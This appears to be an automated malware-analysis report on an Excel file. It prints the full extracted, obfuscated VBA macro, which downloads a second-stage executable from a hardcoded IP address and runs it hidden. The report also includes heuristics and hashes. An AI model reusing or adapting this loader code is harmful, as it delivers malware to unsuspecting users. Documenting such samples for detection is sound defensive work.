MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The VBA macro contains a call to `URLDownloadToFile` which is used to download a payload from the hardcoded URL 'http://185.189.255.200/payload.exe'. The script then attempts to execute the downloaded file, which is saved to 'C:\Users\Public\AppData\Local\Temp\payload.exe'. This indicates a clear intent to download and execute a second-stage payload.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Attribute VB_Name = "Module1" Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal l1ll1l As Long, ByVal l111ll As String, _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim l11lll Set l11lll = CreateObject(l1l1l("ayouqrxios", "i,"".>:D<h%,297")) l1llll = l1l1l("htzilxhopp", "B26IF]dXC=4A=?9@27>.G4)1>Q'F9dA2d%>0D:I9XM/'G>GdCC00IO7;@=9?3.>aR3/g2Q0")
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5003 bytes |
SHA-256: ead307236fe167b5375ab8ee8ae9414ec8f97e7148d0acf5d5b934a3a1589fb8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal l1ll1l As Long, ByVal l111ll As String, _
ByVal l1111l As String, ByVal l111l1 As Long, ByVal l11ll1 As Long) As Long
Sub l11l1(l1ll11 As IRibbonUI)
l111l
End Sub
Sub l111l()
Dim l11l11 As String
Dim l1llll As String
Dim l11ll1 As String
Dim l11lll
Set l11lll = CreateObject(l1l1l("ayouqrxios", "i,"".>:D<h%,297"))
l1llll = l1l1l("htzilxhopp", "B26IF]dXC=4A=?9@27>.G4)1>Q'F9dA2d%>0D:I9XM/'G>GdCC00IO7;@=9?3.>aR3/g2Q0")
l11ll1 = l1l1l("jvcasmhnfa", "Add'$DJA4*0g9A:%")
l11l11 = Now
l11l11 = Replace(l11l11, l1l1l("wxzgnmyeho", "'X"), "")
l11l11 = Replace(l11l11, l1l1l("kgbqcqoxzt", "yH"), "")
l11l11 = Replace(l11l11, l1l1l("htzilxhopp", "cc"), "")
l11l11 = Left(l11l11, 12)
l1lll1 = l11l(3)
l1l1l1 = l11l(2)
l11l11 = l1lll1 & l11l11 & l1l1l1 & l1l1l("kgbqcqoxzt", "mV3")
l11l11 = l11l11 & l1l1l("iohsfguohl", "(D?")
l1l111 = l1llll
l1ll1l = URLDownloadToFile(0, l1l111, l11ll1 & l11l11, 0, 0)
l11l1l = 5
For l1l11l = 0 To l11l1l
If l1l1(l11ll1 & l11l11) Then
l11lll.Run Chr(34) & l11ll1 & l1l1l("vvopihpfus", "y(") & l11l11 & Chr(34), 0
Exit For
Else
l111l1 = 1
l1ll11 = Timer
While Timer < l1ll11 + l111l1
DoEvents
Wend
End If
Next l1l11l
End Sub
Function l1l1(l1111l As String) As Boolean
Dim l1l111 As String
l1l111 = ""
On Error Resume Next
l1l111 = Dir(l1111l)
On Error GoTo 0
If l1l111 = "" Then
l1l1 = False
Else
l1l1 = True
End If
End Function
Function l11l(l11ll1 As Integer) As String
Dim l1lll1 As Variant
Dim l11lll As Long
Dim l1l1l1 As String
l1lll1 = Array(l1l1l("krscltuglk", "e3"), l1l1l("jjpidinlct", "H*"), l1l1l("jctpnrzywp", "W0"), l1l1l("vvopihpfus", "X0"), l1l1l("hnczoaatgh", "b>"), l1l1l("htzilxhopp", "-0"), l1l1l("beezfesgxb", "U."), l1l1l("zxjlxhdcbh", "<8"), l1l1l("srrazhihjl", "K:"), l1l1l("zszhdbjxrj", "X@"), _
l1l1l("lhelxzzlzb", "s="), l1l1l("iqttzhxidq", "J/"), l1l1l("nbhupwrzmm", "T5"), l1l1l("hukzswhzfa", "fA"), l1l1l("vvopihpfus", "#;"), l1l1l("xnsrfkjzbu", "Z;"), l1l1l("vzepfnsfkw", "N8"), l1l1l("krscltuglk", "QD"), l1l1l("drhwdeuzsw", "J6"), l1l1l("drhwdeuzsw", "`7"), l1l1l("chcfaibpko", "kF"), l1l1l("fxfedfolza", "b;"), l1l1l("pmfcnmwjbu", "nE"), l1l1l("zxjlxhdcbh", "+H"), _
l1l1l("lhelxzzlzb", "aK"), l1l1l("njwdnbjldl", "NR"), l1l1l("vzepfnsfkw", "sV"), l1l1l("pmfcnmwjbu", "%^"), l1l1l("krscltuglk", "#c"), l1l1l("njwdnbjldl", "Wj"), l1l1l("ayouqrxios", "^h"), l1l1l("hnczoaatgh", "Jm"), l1l1l("khnmkikwcn", "ea"), l1l1l("heyowizipx", "r]"), l1l1l("njwdnbjldl", ")o"), l1l1l("dtmgjlbion", "]`"), _
l1l1l("kgbqcqoxzt", "|i"), l1l1l("jctpnrzywp", "`n"), l1l1l("khnmkikwcn", "In"), l1l1l("nbhupwrzmm", "bk"), l1l1l("hukzswhzfa", "$w"), l1l1l("dtdhczgstz", "Kj"), l1l1l("dtmgjlbion", "#n"), l1l1l("njwdnbjldl", "B "), _
l1l1l("xnsrfkjzbu", "\s"), l1l1l("vykddwhjpt", "x "), l1l1l("ztrhwahokh", "dl"), l1l1l("czerlwmzzk", "Im"), l1l1l("pmfcnmwjbu", "wz"), l1l1l("uvvgjblztw", "'r"), l1l1l("kgbqcqoxzt", "#w"), l1l1l("beezfesgxb", "Ov"), l1l1l("beezfesgxb", "{w"), l1l1l("jjpidinlct", "&y"), l1l1l("krscltuglk", "&%"), l1l1l("dtdhczgstz", "ex"), l1l1l("wxzgnmyeho", "R~"), l1l1l("upfzmjpepg", "zx"), _
l1l1l("ljpqsiudyn", "?}"), l1l1l("vykddwhjpt", "K."), l1l1l("nbhupwrzmm", "%!"), l1l1l("itdornuftj", "X#"))
For l11lll = 1 To l11ll1
Randomize
l1l1l1 = l1l1l1 & l1lll1(Int((UBound(l1lll1) - LBound(l1lll1) + 1) * Rnd + LBound(l1lll1)))
Next l11lll
l11l = l1l1l1
End Function
Function l1l1l(ParamArray l1llll())
Dim l1ll11, l11l1l, l11111, l1111l, l111ll, l1lll1, l11lll
l1ll11 = ThisWorkbook.CustomDocumentProperties(l1llll(0)).Value: l1l1l = "": l11l1l = 1: l11111 = 1
For l1111l = 1 To UBound(l1llll)
If IsNumeric(l1llll(l1111l)) Then
If l11111 = Len(l1ll11) + 1 Then If l11l1l >= Len(l1ll11) Then l11l1l = 1 Else l11l1l = l11l1l + 1: l11111 = l11l1l
l1lll1 = l1llll(l1111l) - Asc(Mid(l1ll11, l11111, 1)) + 32: l11111 = l11111 + 1: l1l1l = l1l1l + ChrW(l1lll1)
Else
For l11lll = 2 To Len(l1llll(l1111l))
If l11111 = Len(l1ll11) + 1 Then If l11l1l >= Len(l1ll11) Then l11l1l = 1 Else l11l1l = l11l1l + 1: l11111 = l11l1l
l1lll1 = Asc(Mid(l1llll(l1111l), l11lll, 1)) - Asc(Mid(l1ll11, l11111, 1)) + 32: l11111 = l11111 + 1: If l1lll1 < 32 Then l1lll1 = 127 - (32 - l1lll1)
l1l1l = l1l1l + ChrW(l1lll1)
Next
End If
Next
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 47616 bytes |
SHA-256: 4fcd035005a0977c3af5fc8fff0ee06005e3761e8e6170912ae99d7941864bb4 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.